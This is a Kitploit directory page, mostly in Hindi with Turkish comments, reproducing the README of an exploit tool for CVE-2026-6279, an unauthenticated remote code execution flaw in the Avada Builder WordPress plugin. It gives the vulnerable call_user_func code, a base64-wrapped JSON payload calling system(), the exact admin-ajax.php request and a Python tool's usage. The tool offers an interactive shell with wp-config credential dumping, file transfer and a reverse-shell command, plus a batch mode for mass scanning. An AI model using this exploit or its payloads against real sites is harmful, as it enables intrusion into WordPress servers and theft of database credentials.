Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-6279 — CVE-2026-6279: Avada (Fusion) Builder <= 3.15.2 – विजेट AJAX हैंडलर (fusion-builder) के माध्यम से 'render_logics' शॉर्टकोड एट्रिब्यूट द्वारा PHP फ़ंक्शन इंजेक्शन के ज़रिए बिना प्रमाणीकरण के रिमोट कोड निष्पादन | Kitploit
उपकरण/GitHubGitHub/xxconi/cve-2026-6279
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंगपेलोड डेवलपमेंट
GitHubxxconi/cve-2026-6279

CVE-2026-6279

CVE-2026-6279: Avada (Fusion) Builder <= 3.15.2 – विजेट AJAX हैंडलर (fusion-builder) के माध्यम से 'render_logics' शॉर्टकोड एट्रिब्यूट द्वारा PHP फ़ंक्शन इंजेक्शन के ज़रिए बिना प्रमाणीकरण के रिमोट कोड निष्पादन

रिपॉजिटरी देखें
173 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
╔══════════════════════════════════════════════════════════════╗ ║ CVE-2026-6279 · Avada Builder <= 3.15.2 ║ ║ Unauthenticated RCE via call_user_func() ║║ ╚══════════════════════════════════════════════════════════════╝ ```

CVE CVSS Auth Plugin Installs Python


📋 सारांश

फ़ील्डविवरण
CVE IDCVE-2026-6279
प्रभावितAvada Builder (Fusion Builder) <= 3.15.2
थीमWordPress Avada Theme
सक्रिय इंस्टॉल900.000+
कमजोरी का प्रकारPHP Function Injection → Unauthenticated RCE
CVSS v3.19.8 (Critical)
वेक्टरCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
प्रमाणीकरण❌ आवश्यक नहीं
उपयोगकर्ता इंटरैक्शन❌ आवश्यक नहीं
शोधकर्ताxxcoin
प्रकाशन तिथि2026-05-24

🔗 हमला श्रृंखला

root@kitploit:~
┌─────────────────────────────────────────────────────────────────┐
│                                                                 │
│  1. NONCE TESPİT                                                │
│     wp_create_nonce('fusion_load_nonce') → UID 0               │
│     [fusion_post_cards] veya [fusion_table_of_contents]        │
│     shortcode'u olan herkese açık sayfalarda JS'e eklenir      │
│                          │                                      │
│                          ▼                                      │
│  2. UNAUTHENTICATED AJAX                                        │
│     wp_ajax_nopriv_fusion_get_widget_markup                     │
│     check_ajax_referer() → sadece nonce geçerliliği kontrol    │
│     eder, kullanıcı kimliği doğrulanmaz                        │
│                          │                                      │
│                          ▼                                      │
│  3. DESERİALİZASYON                                             │
│     base64_decode(render_logics) → json_decode()               │
│     Yapı doğrulaması yok — saldırgan kontrolündeki JSON        │
│                          │                                      │
│                          ▼                                      │
│  4. call_user_func() — ALLOWLIST YOK                            │
│     get_value() → wp_conditional_tags case                     │
│     call_user_func($value['function'], $value['args'])         │
│     Herhangi bir PHP fonksiyonu çağrılabilir                   │
│                          │                                      │
│                          ▼                                      │
│  5. RCE ✓                                                       │
│     system("id") → uid=1000(xxcoin)                         │
│     Web sunucusu yetkisiyle tam komut yürütme                  │
│                                                                 │
└─────────────────────────────────────────────────────────────────┘

🧬 तकनीकी विवरण

कमजोरी बिंदु

class-fusion-builder-conditional-render-helper.php — L1531:

root@kitploit:~
// VULNERABLE CODE
case 'wp_conditional_tags':
    $decoded = json_decode( base64_decode( $render_logics ), true );
    // ❌ Allowlist kontrolü yok
    return call_user_func( $decoded['function'], $decoded['args'] );

पेलोड संरचना

root@kitploit:~
{
  "type": "wp_conditional_tags",
  "value": {
    "function": "system",
    "args": "id"
  }
}

Base64 एन्कोड करके render_logics POST फ़ील्ड के रूप में भेजा जाता है।

HTTP अनुरोध

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

action=fusion_get_widget_markup
fusion_load_nonce=<nonce>
render_logics=<base64_payload>
widget_type=WP_Widget_Recent_Posts
type=WP_Widget_Recent_Posts
widget_id=2
number=2

✅ सत्यापित RCE फ़ंक्शन

फ़ंक्शनतर्कपरिणामस्थिति
system()iduid=1000(xenon1337)✅ सफल
passthru()iduid=1000(xenon1337)✅ सफल
shell_exec()iduid=1000(xenon1337)✅ सफल
exec()iduid=1000(xenon1337)✅ सफल
file_get_contents()/etc/passwdroot:x:0:0:...✅ सफल
proc_open()——❌ 2+ तर्क आवश्यक
popen()——❌ 2+ तर्क आवश्यक

नोट: call_user_func($fn, $arg) स्वाभाविक रूप से केवल एक तर्क स्वीकार करता है। proc_open, popen जैसे 2+ तर्कों की आवश्यकता वाले फ़ंक्शन इस कमजोरी के माध्यम से ट्रिगर नहीं किए जा सकते।


🔑 Nonce को बायपास क्यों किया जा सकता है?

root@kitploit:~
1. Avada, fusion_load_nonce'u UID 0 (public kullanıcı) için üretir
2. [fusion_post_cards] veya [fusion_table_of_contents] shortcode'u
   içeren sayfalarda nonce JS çıktısına eklenir → herkes görebilir
3. check_ajax_referer('fusion_load_nonce') sadece nonce'un
   geçerliliğini doğrular — kullanıcının kimliğini doğrulamaz
4. Sonuç: Herhangi bir ziyaretçi nonce'u alıp endpoint'i çağırabilir

📁 स्रोत कोड संदर्भ

फ़ाइलपंक्तिफ़ंक्शनविवरण
class-fusion-builder-conditional-render-helper.phpL1083should_render()render_logics डिसीरियलाइज़ेशन
class-fusion-builder-conditional-render-helper.phpL1531get_value()⚠️ call_user_func() — कोई allowlist नहीं
fusion-widget.phpL44—render_logics कनेक्शन
fusion-widget.phpL389—wp_ajax_nopriv AJAX handler पंजीकरण
class-fusion-builder.phpL7551—UID 0 के लिए नियतिवादी nonce पंजीकरण

🚀 स्थापना और उपयोग

आवश्यकताएँ

root@kitploit:~
pip install requests packaging

उपयोग

root@kitploit:~
# Menülü mod (single + batch)
python3 CVE-2026-6279.py

# Protokolsüz (otomatik tespit)
python3 CVE-2026-6279.py target.com

# Protokol ile
python3 CVE-2026-6279.py http://target.com
python3 CVE-2026-6279.py https://target.com

# Port ile
python3 CVE-2026-6279.py target.com:8080
python3 CVE-2026-6279.py http://target.com:8080

मेन्यू

root@kitploit:~
♡ [1]  Single target  ·  interactive shell
◆ [2]  Batch scan     ·  file exploit
✗ [3]  Exit

इंटरैक्टिव शेल कमांड

root@kitploit:~
shell> id                          # komut çalıştır
shell> cd /var/www/html            # dizin değiştir
shell> upload local.php /tmp/x.php # dosya yükle
shell> download /etc/passwd        # dosya indir
shell> wp-config                   # DB bilgileri
shell> recon                       # sistem taraması
shell> revshell 10.0.0.1 4444      # reverse shell
shell> exit                        # çık

बैच स्कैन

root@kitploit:~
# targets.txt formatı:
target1.com
http://target2.com
https://target3.com:8080
# yorum satırı (atlanır)
root@kitploit:~
♡ targets file [targets.txt]:
♡ threads [10]: 30
♡ command [id]:
♡ output file [vuln.txt]:

🖥️ PoC आउटपुट

root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║  CVE-2026-6279  ·  Avada Builder <= 3.15.2                  ║
║  Unauthenticated RCE via call_user_func()                    ║
║  Copyright © 2026 xxcoin  ·  Thanks: xxcoin 💜 ║
╚══════════════════════════════════════════════════════════════╝

★ Avada tespit edildi! (http://localhost:8888)
★ nonce: b6d7b084c2  (src: /blog/)  [shortcode✓]
★ AJAX: http://localhost:8888/wp-admin/admin-ajax.php
★ RCE: system() [B] [WP_Widget_Recent_Posts]
  • uid=1000(xxcoin) gid=1000(xxcoin) groups=1000

shell> uname -a
  • Linux debian 6.1.0-21-amd64 #1 SMP x86_64 GNU/Linux
shell> wp-config
  • DB_NAME=wordpress
  • DB_USER=wp_user
  • DB_PASSWORD=s3cr3t_p4ss!
  • DB_HOST=localhost

📊 CVSS v3.1

मीट्रिकमान
Attack VectorNetwork
Attack ComplexityLow
Privileges RequiredNone
User InteractionNone
ScopeUnchanged
ConfidentialityHigh
IntegrityHigh
AvailabilityHigh
कुल स्कोर9.8 — CRITICAL
root@kitploit:~
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

⚠️ कानूनी चेतावनी

यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है। बिना अनुमति के सिस्टम तक पहुँच अवैध है। सभी ज़िम्मेदारी उपयोगकर्ता की है।


telegram. https://t.me/+-GYq8ydL9AYwZGI8)

CVE-2026-6279 · Avada Builder <= 3.15.2 ·xxcoin · 2026

Special Thanks: Shadow Girlfriend 💜

टूल डाउनलोड करें